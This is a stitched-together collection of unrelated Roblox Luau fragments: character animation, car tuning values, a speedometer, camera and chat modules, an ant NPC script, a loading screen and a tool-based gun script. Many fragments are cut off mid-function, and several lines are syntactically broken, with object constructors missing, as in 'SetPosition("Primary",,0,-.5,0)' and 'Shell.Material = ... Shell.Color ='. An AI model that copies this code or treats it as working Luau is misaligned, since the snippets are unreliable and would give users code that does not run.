-- humanoidAnimatePlayEmote.lua
local Figure = script.Parent local Torso = Figure:WaitForChild("Torso") local RightShoulder = Torso:WaitForChild("Right Shoulder") local LeftShoulder = Torso:WaitForChild("Left Shoulder") local RightHip = Torso:WaitForChild("Right Hip") local LeftHip = Torso:WaitForChild("Left Hip") local Neck = Torso:WaitForChild("Neck") local Humanoid = Figure:WaitForChild("Humanoid") local pose = "Standing" local EMOTE_TRANSITION_TIME = 0.1 local userAnimateScaleRunSuccess, userAnimateScaleRunValue = pcall(function() return UserSettings():IsUserFeatureEnabled("UserAnimateScaleRun") end) local userAnimateScaleRun = userAnimateScaleRunSuccess and userAnimateScaleRunValue local function getRigScale() if userAnimateScaleRun then return Figure:GetScale() else return 1 end end local currentAnim = "" local currentAnimInstance = nil local currentAnimTrack = nil local currentAnimKeyframeHandler = nil local currentAnimSpeed = 1.0 local animTable = {} local animNames = { idle = { { id = "", weight = 9 }, { id = "", weight = 1 } }, walk = { { id = "", weight = 10 } }, run = { { id = "run.xml", weight = 10 } }, jump = { { id = "", weight = 10 } }, fall = { { id = "", weight = 10 } }, climb = { { id = "", weight = 10 } }, sit = { { id = "", weight = 10 } }, toolnone = { { id = "", weight = 10 } }, toolslash = { { id = "", weight = 10 }
--[[ CreateGameState Description: This server script creates the game state machine based on the current gamemode selected by this script Gamemode attribute. ]]
--[[ An implementation of Promises similar to Promise/A+. ]]
local tutils = require(script.Parent.tutils) local PROMISE_DEBUG = true
--[=[ Utility functions for the TemplateProvider @class TemplateContainerUtils ]=]
local Workspace = game:GetService("Workspace") local RunService = game:GetService("RunService") local TemplateContainerUtils = {} function TemplateContainerUtils.reparentFromWorkspaceIfNeeded(parent, name) assert(typeof(parent) == "Instance", "Bad parent") assert(type(name) == "string", "Bad name") local workspaceContainer = Workspace:FindFirstChild(name) local parentedContainer = parent:FindFirstChild(name) if workspaceContainer then if parentedContainer then error(("Duplicate container in %q and %q"):format( workspaceContainer:GetFullName(), parentedContainer:GetFullName())) end -- Reparent if RunService:IsRunning() then workspaceContainer.Parent = parent end return workspaceContainer end if not parentedContainer then error(("No template container with name %q in %q") :format(parent:GetFullName(), name)) end return parentedContainer end return TemplateContainerUtils
--[[Weight and CG]]
Tune.Weight = 3934 -- Total weight (in pounds) Tune.WeightBSize = { -- Size of weight brick (dimmensions in studs ; larger = more stable) --[[Width]] 6 , --[[Height]] 3.5 , --[[Length]] 14 } Tune.WeightDist = 50 -- Weight distribution (0 - on rear wheels, 100 - on front wheels, can be <0 or >100) Tune.CGHeight = .8 -- Center of gravity height (studs relative to median of all wheels) Tune.WBVisible = false -- Makes the weight brick visible
-- Decompiled with the Synapse X Luau decompiler.
return function(p1) local v1 = 0; for v2 in pairs(p1) do v1 = v1 + 1; end; return v1; end;
--[[ Package link auto-generated by Rotriever ]]
local PackageIndex = script.Parent.Parent._Index local Package = require(PackageIndex["TestEZ-28fc8954-0.4.2"]["TestEZ"]) return Package
--[[ ___ _______ _ / _ |____/ ___/ / ___ ____ ___ (_)__ / __ /___/ /__/ _ \/ _ `(_-<(_-</ (_-< /_/ |_| \___/_//_/\_,_/___/___/_/___/ SecondLogic @ Inspare ]]
local autoscaling = false --Estimates top speed local UNITS = { --Click on speed to change units --First unit is default { units = "MPH" , scaling = (10/12) * (60/88) , -- 1 stud : 10 inches | ft/s to MPH maxSpeed = 140 , spInc = 20 , -- Increment between labelled notches }, { units = "KM/H" , scaling = (10/12) * 1.09728 , -- 1 stud : 10 inches | ft/s to KP/H maxSpeed = 240 , spInc = 20 , -- Increment between labelled notches }, { units = "SPS" , scaling = 1 , -- Roblox standard maxSpeed = 200 , spInc = 40 , -- Increment between labelled notches } }
--local MouseInput = Tool:WaitForChild("MousePos",10)
local Services = { Players = (game:FindService("Players") or game:GetService("Players")), TweenService = (game:FindService("TweenService") or game:GetService("TweenService")), RunService = (game:FindService("RunService") or game:GetService("RunService")), Input = (game:FindService("ContextActionService") or game:GetService("ContextActionService")) } local Player,Character,Humanoid function Primary(actionName, inputState, inputObj) if inputState == Enum.UserInputState.Begin then Remote:FireServer(Enum.KeyCode.Q) end end function Equipped() Player = Services.Players.LocalPlayer Character = Player.Character Humanoid = Character:FindFirstChildOfClass("Humanoid") if not Humanoid or not Humanoid.Parent or Humanoid.Health <= 0 then return end Services.Input:BindAction("Primary",Primary,true,Enum.KeyCode.Q,Enum.KeyCode.ButtonX) Services.Input:SetTitle("Primary","Black hole") Services.Input:SetPosition("Primary",,0,-.5,0)) end function Unequipped() Services.Input:UnbindAction("Primary") end Tool.Equipped:Connect(Equipped) Tool.Unequipped:Connect(Unequipped)
-- Listener for changes to workspace.CurrentCamera
function BaseCamera:OnCurrentCameraChanged() if UserInputService.TouchEnabled then if self.viewportSizeChangedConn then self.viewportSizeChangedConn:Disconnect() self.viewportSizeChangedConn = nil end local newCamera = game.Workspace.CurrentCamera if newCamera then self:OnViewportSizeChanged() self.viewportSizeChangedConn = newCamera:GetPropertyChangedSignal("ViewportSize"):Connect(function() self:OnViewportSizeChanged() end) end end -- VR support additions if self.cameraSubjectChangedConn then self.cameraSubjectChangedConn:Disconnect() self.cameraSubjectChangedConn = nil end local camera = game.Workspace.CurrentCamera if camera then self.cameraSubjectChangedConn = camera:GetPropertyChangedSignal("CameraSubject"):Connect(function() self:OnNewCameraSubject() end) self:OnNewCameraSubject() end end function BaseCamera:OnDynamicThumbstickEnabled() if UserInputService.TouchEnabled then self.isDynamicThumbstickEnabled = true end end function BaseCamera:OnDynamicThumbstickDisabled() self.isDynamicThumbstickEnabled = false end function BaseCamera:OnGameSettingsTouchMovementModeChanged() if player.DevTouchMovementMode == Enum.DevTouchMovementMode.UserChoice then if (UserGameSettings.TouchMovementMode == Enum.TouchMovementMode.DynamicThumbstick or UserGameSettings.TouchMovementMode == Enum.TouchMovementMode.Default) then self:OnDynamicThumbstickEnabled() else self:OnDynamicThumbstickDisabled() end end end function BaseCamera:OnDevTouchMovementModeChanged() if player.DevTouchMovementMode.Name == "DynamicThumbstick" then self:OnDynamicThumbstickEnabled() else self:OnGameSettingsTouchMovementModeChanged() end end function BaseCamera:OnPlayerCameraPropertyChange() -- This call forces re-evaluation of player.CameraMode and clamping to min/max distance which may have changed self:SetCameraToSubjectDistance(self.currentSubjectDistance) end function BaseCamera:GetCameraHeight() if VRService.VREnabled and not self.inFirstPerson then return math.sin(VR_ANGLE) * self.currentSubjectDistance end return 0 end function BaseCamera:InputTranslationToCameraAngleChange(translationVector, sensitivity) return translationVector * sensitivity end function BaseCamera:Enable(enable) if self.enabled ~= enable then self.enabled = enable if self.enabled then self:ConnectInputEvents() self:BindContextActions() if player.CameraMode == Enum.CameraMode.LockFirstPerson then self.currentSubjectDistance = 0.5 if not self.inFirstPerson then self:EnterFirstPerson() end end else self:DisconnectInputEvents() self:UnbindContextActions() -- Clean up additional event listeners and reset a bunch of properties self:Cleanup() end end end function BaseCamera:GetEnabled() return self.enabled end function BaseCamera:OnInputBegan(input, processed) if input.UserInputType == Enum.UserInputType.Touch then self:OnTouchBegan(input, processed) elseif input.UserInputType == Enum.UserInputType.MouseButton2 then self:OnMouse2Down(input, processed) elseif input.UserInputType == Enum.UserInputType.MouseButton3 then self:OnMouse3Down(input, processed) end end function BaseCamera:OnInputChanged(input, processed) if input.UserInputType == Enum.UserInputType.Touch then self:OnTouchChanged(input, processed) elseif input.UserInputType == Enum.UserInputType.MouseMovement then self:OnMouseMoved(input, processed) end end function BaseCamera:OnInputEnded(input, processed) if input.UserInputType == Enum.UserInputType.Touch then self:OnTouchEnded(input, processed) elseif input.UserInputType == Enum.UserInputType.MouseButton2 then self:OnMouse2Up(input, processed) elseif input.UserInputType == Enum.UserInputType.MouseButton3 then self:OnMouse3Up(input, processed) end end function BaseCamera:OnPointerAction(wheel, pan, pinch, processed) if processed then return end if pan.Magnitude > 0 then local inversionVector =, UserGameSettings:GetCameraYInvertValue()) local rotateDelta = self:InputTranslationToCameraAngleChange(PAN_SENSITIVITY*pan, MOUSE_SENSITIVITY)*inversionVector self.rotateInput = self.rotateInput + rotateDelta end local zoom = self.currentSubjectDistance local zoomDelta = -(wheel + pinch) if abs(zoomDelta) > 0 then local newZoom if self.inFirstPerson and zoomDelta > 0 then newZoom = FIRST_PERSON_DISTANCE_THRESHOLD else if FFlagUserFixZoomInZoomOutDiscrepancy then if (zoomDelta > 0) then newZoom = zoom + zoomDelta*(1 + zoom*ZOOM_SENSITIVITY_CURVATURE) else newZoom = (zoom + zoomDelta) / (1 - zoomDelta*ZOOM_SENSITIVITY_CURVATURE) end else newZoom = zoom + zoomDelta*(1 + zoom*ZOOM_SENSITIVITY_CURVATURE) end end self:SetCameraToSubjectDistance(newZoom) end end function BaseCamera:ConnectInputEvents() self.pointerActionConn = UserInputService.PointerAction:Connect(function(wheel, pan, pinch, processed) self:OnPointerAction(wheel, pan, pinch, processed) end) self.inputBeganConn = UserInputService.InputBegan:Connect(function(input, processed) self:OnInputBegan(input, processed) end) self.inputChangedConn = UserInputService.InputChanged:Connect(function(input, processed) self:OnInputChanged(input, processed) end) self.inputEndedConn = UserInputService.InputEnded:Connect(function(input, processed) self:OnInputEnded(input, processed) end) self.menuOpenedConn = GuiService.MenuOpened:connect(function() self:ResetInputStates() end) self.gamepadConnectedConn = UserInputService.GamepadDisconnected:connect(function(gamepadEnum) if self.activeGamepad ~= gamepadEnum then return end self.activeGamepad = nil self:AssignActivateGamepad() end) self.gamepadDisconnectedConn = UserInputService.GamepadConnected:connect(function(gamepadEnum) if self.activeGamepad == nil then self:AssignActivateGamepad() end end) self:AssignActivateGamepad() if not FFlagUserCameraToggle then self:UpdateMouseBehavior() end end function BaseCamera:BindContextActions() self:BindGamepadInputActions() self:BindKeyboardInputActions() end function BaseCamera:AssignActivateGamepad() local connectedGamepads = UserInputService:GetConnectedGamepads() if #connectedGamepads > 0 then for i = 1, #connectedGamepads do if self.activeGamepad == nil then self.activeGamepad = connectedGamepads[i] elseif connectedGamepads[i].Value < self.activeGamepad.Value then self.activeGamepad = connectedGamepads[i] end end end if self.activeGamepad == nil then -- nothing is connected, at least set up for gamepad1 self.activeGamepad = Enum.UserInputType.Gamepad1 end end function BaseCamera:DisconnectInputEvents() if self.inputBeganConn then self.inputBeganConn:Disconnect() self.inputBeganConn = nil end if self.inputChangedConn then self.inputChangedConn:Disconnect() self.inputChangedConn = nil end if self.inputEndedConn then self.inputEndedConn:Disconnect() self.inputEndedConn = nil end end function BaseCamera:UnbindContextActions() for i = 1, #self.boundContextActions do ContextActionService:UnbindAction(self.boundContextActions[i]) end self.boundContextActions = {} end function BaseCamera:Cleanup() if self.pointerActionConn then self.pointerActionConn:Disconnect() self.pointerActionConn = nil end if self.menuOpenedConn then self.menuOpenedConn:Disconnect() self.menuOpenedConn = nil end if self.mouseLockToggleConn then self.mouseLockToggleConn:Disconnect() self.mouseLockToggleConn = nil end if self.gamepadConnectedConn then self.gamepadConnectedConn:Disconnect() self.gamepadConnectedConn = nil end if self.gamepadDisconnectedConn then self.gamepadDisconnectedConn:Disconnect() self.gamepadDisconnectedConn = nil end if self.subjectStateChangedConn then self.subjectStateChangedConn:Disconnect() self.subjectStateChangedConn = nil end if self.viewportSizeChangedConn then self.viewportSizeChangedConn:Disconnect() self.viewportSizeChangedConn = nil end if self.touchActivateConn then self.touchActivateConn:Disconnect() self.touchActivateConn = nil end self.turningLeft = false self.turningRight = false self.lastCameraTransform = nil self.lastSubjectCFrame = nil self.userPanningTheCamera = false self.rotateInput = if FFlagUserFixGamepadCameraTracking then if self.gamepadPanningCamera then self.gamepadPanningCamera = ZERO_VECTOR2 end else self.gamepadPanningCamera =,0) end -- Reset input states self.startPos = nil self.lastPos = nil self.panBeginLook = nil self.isRightMouseDown = false self.isMiddleMouseDown = false self.fingerTouches = {} self.dynamicTouchInput = nil self.numUnsunkTouches = 0 self.startingDiff = nil self.pinchBeginZoom = nil -- Unlock mouse for example if right mouse button was being held down if UserInputService.MouseBehavior ~= Enum.MouseBehavior.LockCenter then UserInputService.MouseBehavior = Enum.MouseBehavior.Default end end
-- Used to lock the chat bar when the user has chat turned off.
function methods:DoLockChatBar() if self.TextLabel then if LocalPlayer.UserId > 0 then self.TextLabel.Text = "To chat in game, turn on chat in your Privacy Settings." else self.TextLabel.Text = "Sign up to chat in game." end self:CalculateSize() end if self.TextBox then self.TextBox.Active = false self.TextBox.Focused:connect(function() self.TextBox:ReleaseFocus() end) end end function methods:SetUpTextBoxEvents(TextBox, TextLabel, MessageModeTextButton) --// Code for getting back into general channel from other target channel when pressing backspace. UserInputService.InputBegan:connect(function(inputObj, gpe) if (inputObj.KeyCode == Enum.KeyCode.Backspace) then if (self:IsFocused() and TextBox.Text == "") then self:SetChannelTarget(ChatSettings.GeneralChannelName) end end end) TextBox.Changed:connect(function(prop) if prop == "AbsoluteSize" then self:CalculateSize() return end if prop ~= "Text" then return end self:CalculateSize() if (string.len(TextBox.Text) > ChatSettings.MaximumMessageLength) then TextBox.Text = string.sub(TextBox.Text, 1, ChatSettings.MaximumMessageLength) return end if not self.InCustomState then local customState = self.CommandProcessor:ProcessInProgressChatMessage(TextBox.Text, self.ChatWindow, self) if customState then self.InCustomState = true self.CustomState = customState end else self.CustomState:TextUpdated() end end) local function UpdateOnFocusStatusChanged(isFocused) if isFocused or TextBox.Text ~= "" then TextLabel.Visible = false else TextLabel.Visible = true end end MessageModeTextButton.MouseButton1Click:connect(function() if MessageModeTextButton.Text ~= "" then self:SetChannelTarget(ChatSettings.GeneralChannelName) end end) TextBox.Focused:connect(function() if not self.UserHasChatOff then self:CalculateSize() UpdateOnFocusStatusChanged(true) end end) TextBox.FocusLost:connect(function(enterPressed, inputObject) self:CalculateSize() if (inputObject and inputObject.KeyCode == Enum.KeyCode.Escape) then TextBox.Text = "" end UpdateOnFocusStatusChanged(false) end) end function methods:GetTextBox() return self.TextBox end function methods:GetMessageModeTextButton() return self.GuiObjects.MessageModeTextButton end
--[=[ Adds commas to a number. Not culture aware. @param number string | number @return string ]=]
function String.addCommas(number: string | number): string if type(number) == "number" then number = tostring(number) end local index = -1 while index ~= 0 do number, index = string.gsub(number, "^(-?%d+)(%d%d%d)", '%1,%2') end return number end return String
-- LightService
local LightService = game:GetService("Lighting")
-- << API >>
function hd:SetTopbarTransparency(number) number = tonumber(number) or 0.5 topBarFrame.BackgroundTransparency = number end function hd:SetTopbarEnabled(boolean) if type(boolean) ~= "boolean" then boolean = true end main.topbarEnabled = boolean topBarFrame.Visible = boolean main:GetModule("TopBar"):CoreGUIsChanged() end return hd
--DevVince was here.:o (4/23/2019) --Fixed some stuff and made ants go after diffrent targets.
local hill = script.Parent local itemData = require(game.ReplicatedStorage.Modules.ItemData) local activeAnts = {} function GetDictionaryLength(tab) local total = 0 for _,v in next, tab do total = total + 1 end return total end addAnt = coroutine.wrap(function() while wait(5) do if GetDictionaryLength(activeAnts) < 3 then local newAnt = game.ServerStorage.Creatures['Scavenger Ant']:Clone() newAnt:SetPrimaryPartCFrame(hill.PrimaryPart.CFrame*,5,0)) newAnt.Parent = hill activeAnts[newAnt] = { ["carrying"] = nil, ["target"] = nil, ["destination"] = newAnt.PrimaryPart.Position, ["lastOrder"] = tick(), ["lastScan"] = tick(), ["anims"] = {}, } for _,anim in next,game.ReplicatedStorage.NPCAnimations.Ant:GetChildren() do activeAnts[newAnt].anims[anim.Name] = newAnt:WaitForChild("Hum"):LoadAnimation(anim) end newAnt:WaitForChild'Health'.Changed:connect(function() newAnt.PrimaryPart.Hurt.Pitch = newAnt.PrimaryPart.Hurt.OriginalPitch.Value+(math.random(-100,100)/100) newAnt.PrimaryPart.Hurt:Play() end) newAnt.AncestryChanged:connect(function() activeAnts[newAnt] = nil end) end wait(55) end end) addAnt() function Seeking(array, target)--Queen ant keeps track of her workers. ;) for i,v in pairs(array) do if v == target then return true end end return false end manageAnts = coroutine.wrap(function() while wait(1) do local seeking = {} for ant, antData in next,activeAnts do spawn(function() if ant and ant.PrimaryPart and ant:FindFirstChild'Hum' and ant.Hum.Health > 0 and ant:IsDescendantOf(workspace) then activeAnts[ant].lastScan = tick() -- scan for nearest Shelly if not activeAnts[ant].carrying then local nearestShelly,closestDist = nil,math.huge for _,creature in next, workspace.Critters:GetChildren() do if not Seeking(seeking, creature) and creature:FindFirstChild'HitShell' and itemData[creature.Name].abductable then local a, c = ant.PrimaryPart, creature.PrimaryPart if not c then c = creature:FindFirstChildOfClass'BasePart' end local dist = (c.Position-a.Position).magnitude if dist < closestDist then nearestShelly = creature closestDist = dist end end end if ant and nearestShelly then activeAnts[ant].destination = nearestShelly.PrimaryPart.Position activeAnts[ant].target = nearestShelly table.insert(seeking, nearestShelly) activeAnts[ant].target.AncestryChanged:connect(function() activeAnts[ant].target = nil end) end else activeAnts[ant].destination =,3,0) end if activeAnts[ant].destination then ant.Hum:MoveTo(activeAnts[ant].destination) if not activeAnts[ant].anims.AntWalk.IsPlaying then activeAnts[ant].anims.AntWalk:Play() end if and not antData.carrying then local dist = (ant.PrimaryPart.Position-activeAnts[ant].target.PrimaryPart.Position).magnitude if dist < 5 then -- let's get a new shelly local abductedShelly = game.ServerStorage.Misc["Abducted Shelly"]:Clone() antData.carrying = abductedShelly abductedShelly.Shell.Material = abductedShelly.Shell.Color = abductedShelly.ActualName.Value = --game.ReplicatedStorage.Events.NPCAttack:Fire(,math.huge) abductedShelly.Parent = ant activeAnts[ant].anims.AntWalk:Stop() activeAnts[ant].anims.AntHold:Play() ant.PrimaryPart.Chatter:Play() ant.PrimaryPart.ShellyAbduct:Play() -- weld the shelly to the torso local weld ="ManualWeld") weld.Parent = ant.PrimaryPart weld.Part0 = ant.PrimaryPart weld.Part1 = abductedShelly.PrimaryPart weld.C0 =,.4,-1.6)*CFrame.Angles(0,math.rad(90),0) end elseif antData.carrying then local dist = (ant.PrimaryPart.Position-activeAnts[ant].destination).magnitude if dist < 7 then ant.Hum:MoveTo(ant.PrimaryPart.Position) ant.PrimaryPart.Chatter:Play() activeAnts[ant].anims.AntHold:Stop() activeAnts[ant].anims.AntWalk:Stop() activeAnts[ant].carrying:Destroy() activeAnts[ant].carrying = nil activeAnts[ant].destination = nil activeAnts[ant].target = nil end end end end end)--Help prevent breaking and faster responding times for ants. end--Shouldn't error now though. end end) manageAnts()
-- Removes Ownership after Disconnect
game.Players.PlayerRemoving:Connect(function(player) local claim = script.Parent.OwnerName.Value if claim == player.Name then script.Parent.OwnerName.Value = "" script.Parent.Parent.GUIPart.bruh.Words.Text = "No Owner" prompt.Enabled = false rentprompt.Enabled = true end end)
--local PlayerDataClient = require(ReplicatedStorage:WaitForChild("PlayerData").Client)
local LoadingScreen = require(script.Parent.LoadingScreen) local REQUIRED_ASSETS = { -- Instances or content strings that are important to display first } LoadingScreen.enableAsync() LoadingScreen.updateDetailText("Preloading important assets...") ContentProvider:PreloadAsync(REQUIRED_ASSETS) LoadingScreen.updateDetailText("Initializing...") task.wait(1.5) LoadingScreen.updateDetailText("Loading user data...") LoadingScreen.updateDetailText("Spawning character...") task.wait(3) LoadingScreen.updateDetailText("Finishing up...") task.wait(0.5) LoadingScreen.disableAsync()
local TweenService = game:GetService("TweenService") local parent = script.Parent
--Returns an animation class for the given id.
local AnimationCache = {} local function GetAnimation(AnimationId) if not AnimationCache[AnimationId] then local Animation ="Animation") Animation.AnimationId = AnimationId AnimationCache[AnimationId] = Animation end return AnimationCache[AnimationId] end
--local TEAM = Character:WaitForChild("TEAM")
local VisualizeBullet = script.Parent:WaitForChild("VisualizeBullet") local Module = require(Tool:WaitForChild("Setting")) local GunScript_Server = Tool:WaitForChild("GunScript_Server") local ChangeAmmoAndClip = GunScript_Server:WaitForChild("ChangeAmmoAndClip") local InflictTarget = GunScript_Server:WaitForChild("InflictTarget") local AmmoValue = GunScript_Server:WaitForChild("Ammo") local ClipsValue = GunScript_Server:WaitForChild("Clips") local GUI = script:WaitForChild("GunGUI") local IdleAnim local FireAnim local ReloadAnim local ShotgunClipinAnim local Grip2 local Handle2 local HandleToFire = Handle if Module.DualEnabled then Handle2 = Tool:WaitForChild("Handle2",2) if Handle2 == nil and Module.DualEnabled then error("\"Dual\" setting is enabled but \"Handle2\" is missing!") end end local Equipped = false local Enabled = true local Down = false local Reloading = false local AimDown = false local Ammo = AmmoValue.Value local Clips = ClipsValue.Value local MaxClip = Module.MaxClip local PiercedHumanoid = {} if Module.IdleAnimationID ~= nil or Module.DualEnabled then IdleAnim = Tool:WaitForChild("IdleAnim") IdleAnim = Humanoid:LoadAnimation(IdleAnim) end if Module.FireAnimationID ~= nil then FireAnim = Tool:WaitForChild("FireAnim") FireAnim = Humanoid:LoadAnimation(FireAnim) end if Module.ReloadAnimationID ~= nil then ReloadAnim = Tool:WaitForChild("ReloadAnim") ReloadAnim = Humanoid:LoadAnimation(ReloadAnim) end if Module.ShotgunClipinAnimationID ~= nil then ShotgunClipinAnim = Tool:WaitForChild("ShotgunClipinAnim") ShotgunClipinAnim = Humanoid:LoadAnimation(ShotgunClipinAnim) end function wait(TimeToWait) if TimeToWait ~= nil then local TotalTime = 0 TotalTime = TotalTime + game:GetService("RunService").Heartbeat:wait() while TotalTime < TimeToWait do TotalTime = TotalTime + game:GetService("RunService").Heartbeat:wait() end else game:GetService("RunService").Heartbeat:wait() end end function RayCast(Start,Direction,Range,Ignore) local Hit,EndPos = game.Workspace:FindPartOnRay(,Direction*Range),Ignore) if Hit then if (Hit.Transparency > 0.75 or Hit.Name == "Handle" or Hit.Name == "Effect" or Hit.Name == "Bullet" or Hit.Name == "Laser" or string.lower(Hit.Name) == "water" or Hit.Name == "Rail" or Hit.Name == "Arrow" or (Hit.Parent:FindFirstChild("Humanoid") and Hit.Parent.Humanoid.Health == 0) or (Hit.Parent:FindFirstChild("Humanoid") and Hit.Parent:FindFirstChild("TEAM") and TEAM and Hit.Parent.TEAM.Value == TEAM.Value)) or (Hit.Parent:FindFirstChild("Humanoid") and PiercedHumanoid[Hit.Parent.Humanoid]) then Hit,EndPos = RayCast(EndPos+(Direction*.01),Direction,Range-((Start-EndPos).magnitude),Ignore) end end return Hit,EndPos end function ShakeCamera() if Module.CameraShakingEnabled then local Intensity = Module.Intensity/(AimDown and Module.MouseSensitive or 1) for i = 1, 10 do local cam_rot = Camera.CoordinateFrame - Camera.CoordinateFrame.p local cam_scroll = (Camera.CoordinateFrame.p - Camera.Focus.p).magnitude local ncf =*cam_rot*CFrame.fromEulerAnglesXYZ((-Intensity+(math.random()*(Intensity*2)))/100, (-Intensity+(math.random()*(Intensity*2)))/100, 0) Camera.CoordinateFrame = ncf*, 0, cam_scroll) wait() end end end function Fire(ShootingHandle) local PierceAvailable = Module.Piercing PiercedHumanoid = {} if FireAnim then FireAnim:Play(nil,nil,Module.FireAnimationSpeed) end if not ShootingHandle.FireSound.Playing or not ShootingHandle.FireSound.Looped then ShootingHandle.FireSound:Play() script.Parent.Model.casing:FireServer() end local Start = (Humanoid.Torso.CFrame *,1.5,0)).p--(Handle.CFrame *,Module.MuzzleOffset.Y,Module.MuzzleOffset.Z)).p local Spread = Module.Spread*(AimDown and 1-Module.SpreadRedution or 1) local Direction = (,Mouse.Hit.p) * CFrame.Angles(math.rad(-Spread+(math.random()*(Spread*2))),math.rad(-Spread+(math.random()*(Spread*2))),0)).lookVector while PierceAvailable >= 0 do local Hit,EndPos = RayCast(Start,Direction,5000,Character) if not Module.ExplosiveEnabled then if Hit and Hit.Parent then local TargetHumanoid = Hit.Parent:FindFirstChild("Humanoid") local TargetTorso = Hit.Parent:FindFirstChild("HumanoidRootPart") --local TargetTEAM = Hit.Parent:FindFirstChild("TEAM") if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then --if TargetTEAM and TargetTEAM.Value ~= TEAM.Value then InflictTarget:FireServer(TargetHumanoid, TargetTorso, (Hit.Name == "Head" and Module.HeadshotEnabled) and Module.BaseDamage * Module.HeadshotDamageMultiplier or Module.BaseDamage, Direction, Module.Knockback, Module.Lifesteal, Module.FlamingBullet) PiercedHumanoid[TargetHumanoid] = true --end else PierceAvailable = 0 end end else local Explosion ="Explosion") Explosion.BlastRadius = Module.Radius Explosion.BlastPressure = 0 Explosion.Position = EndPos Explosion.Parent = Workspace.CurrentCamera Explosion.Hit:connect(function(Hit) if Hit and Hit.Parent and Hit.Name == "Torso" then local TargetHumanoid = Hit.Parent:FindFirstChild("Humanoid") local TargetTorso = Hit.Parent:FindFirstChild("Torso") --local TargetTEAM = Hit.Parent:FindFirstChild("TEAM") if TargetHumanoid and TargetHumanoid.Health > 0 and TargetTorso then --if TargetTEAM and TargetTEAM.Value ~= TEAM.Value then InflictTarget:FireServer(TargetHumanoid, TargetTorso, (Hit.Name == "Head" and Module.HeadshotEnabled) and Module.BaseDamage * Module.HeadshotDamageMultiplier or Module.BaseDamage, Direction, Module.Knockback, Module.Lifesteal, Module.FlamingBullet) --end end end end) PierceAvailable = 0 end PierceAvailable = Hit and (PierceAvailable - 1) or -1 script.Parent.BulletVisualizerScript.Visualize:Fire(nil,ShootingHandle, Module.MuzzleOffset, EndPos, script.MuzzleEffect, script.HitEffect, Module.HitSoundIDs[math.random(1,#Module.HitSoundIDs)], {Module.ExplosiveEnabled,Module.BlastRadius,Module.BlastPressure}, {Module.BulletSpeed,Module.BulletSize,Module.BulletColor,Module.BulletTransparency,Module.BulletMaterial,Module.FadeTime}, false, PierceAvailable == -1 and Module.VisualizerEnabled or false) script.Parent.VisualizeBullet:FireServer(ShootingHandle, Module.MuzzleOffset, EndPos, script.MuzzleEffect, script.HitEffect, Module.HitSoundIDs[math.random(1,#Module.HitSoundIDs)], {Module.ExplosiveEnabled,Module.BlastRadius,Module.BlastPressure}, {Module.BulletSpeed,Module.BulletSize,Module.BulletColor,Module.BulletTransparency,Module.BulletMaterial,Module.FadeTime}, true, PierceAvailable == -1 and Module.VisualizerEnabled or false) Start = EndPos + (Direction*0.01) end end function Reload() if Enabled and not Reloading and (Clips > 0 or not Module.LimitedClipEnabled) and Ammo < Module.AmmoPerClip then Reloading = true if AimDown then Workspace.CurrentCamera.FieldOfView = 70 --[[local GUI = game.Players.LocalPlayer.PlayerGui:FindFirstChild("ZoomGui") if GUI then GUI:Destroy() end]] GUI.Scope.Visible = false game.Players.LocalPlayer.CameraMode = Enum.CameraMode.Classic script["Mouse Sensitivity"].Disabled = true AimDown = false Mouse.Icon = "rbxassetid://"..Module.MouseIconID end UpdateGUI() if Module.ShotgunReload then for i = 1,(Module.AmmoPerClip - Ammo) do if ShotgunClipinAnim then ShotgunClipinAnim:Play(nil,nil,Module.ShotgunClipinAnimationSpeed) end Handle.ShotgunClipin:Play() wait(Module.ShellClipinSpeed) end end if ReloadAnim then ReloadAnim:Play(nil,nil,Module.ReloadAnimationSpeed) end Handle.ReloadSound:Play() script.Parent.Model.reload:FireServer() wait(Module.ReloadTime) if Module.LimitedClipEnabled then Clips = Clips - 1 end Ammo = Module.AmmoPerClip ChangeAmmoAndClip:FireServer(Ammo,Clips) Reloading = false UpdateGUI() end end function UpdateGUI() GUI.Frame.Ammo.Fill:TweenSizeAndPosition(,0,1,0),,0,0,0), Enum.EasingDirection.Out, Enum.EasingStyle.Quint, 0.25, true) GUI.Frame.Clips.Fill:TweenSizeAndPosition(,0,1,0),,0,0,0), Enum.EasingDirection.Out, Enum.EasingStyle.Quint, 0.25, true) GUI.Frame.Ammo.Current.Text = Ammo GUI.Frame.Ammo.Max.Text = Module.AmmoPerClip GUI.Frame.Clips.Current.Text = Clips GUI.Frame.Clips.Max.Text = Module.MaxClip GUI.Frame.Ammo.Current.Visible = not Reloading GUI.Frame.Ammo.Max.Visible = not Reloading GUI.Frame.Ammo.Frame.Visible = not Reloading GUI.Frame.Ammo.Reloading.Visible = Reloading GUI.Frame.Clips.Current.Visible = not (Clips <= 0) GUI.Frame.Clips.Max.Visible = not (Clips <= 0) GUI.Frame.Clips.Frame.Visible = not (Clips <= 0) GUI.Frame.Clips.NoMoreClip.Visible = (Clips <= 0) GUI.Frame.Clips.Visible = Module.LimitedClipEnabled GUI.Frame.Size = Module.LimitedClipEnabled and,250,0,100) or,250,0,55) GUI.Frame.Position = Module.LimitedClipEnabled and,-260,1,-110)or,-260,1,-65) end Mouse.Button1Down:connect(function() Down = true local IsChargedShot = false if Equipped and Enabled and Down and not Reloading and Ammo > 0 and Humanoid.Health > 0 then Enabled = false if Module.ChargedShotEnabled then if HandleToFire:FindFirstChild("ChargeSound") then HandleToFire.ChargeSound:Play() end wait(Module.ChargingTime) IsChargedShot = true end if Module.MinigunEnabled then if HandleToFire:FindFirstChild("WindUp") then HandleToFire.WindUp:Play() end wait(Module.DelayBeforeFiring) end while Equipped and not Reloading and (Down or IsChargedShot) and Ammo > 0 and Humanoid.Health > 0 do IsChargedShot = false for i = 1,(Module.BurstFireEnabled and Module.BulletPerBurst or 1) do Spawn(ShakeCamera) for x = 1,(Module.ShotgunEnabled and Module.BulletPerShot or 1) do Fire(HandleToFire) end Ammo = Ammo - 1 ChangeAmmoAndClip:FireServer(Ammo,Clips) UpdateGUI() if Module.BurstFireEnabled then wait(Module.BurstRate) end if Ammo <= 0 then break end end HandleToFire = (HandleToFire == Handle and Module.DualEnabled) and Handle2 or Handle wait(Module.FireRate) if not Module.Auto then break end end if HandleToFire.FireSound.Playing and HandleToFire.FireSound.Looped then HandleToFire.FireSound:Stop() end if Module.MinigunEnabled then if HandleToFire:FindFirstChild("WindDown") then HandleToFire.WindDown:Play() end wait(Module.DelayAfterFiring) end Enabled = true if Ammo <= 0 then Reload() end end end) Mouse.Button1Up:connect(function() Down = false end) ChangeAmmoAndClip.OnClientEvent:connect(function(ChangedAmmo,ChangedClips) Ammo = ChangedAmmo Clips = ChangedClips 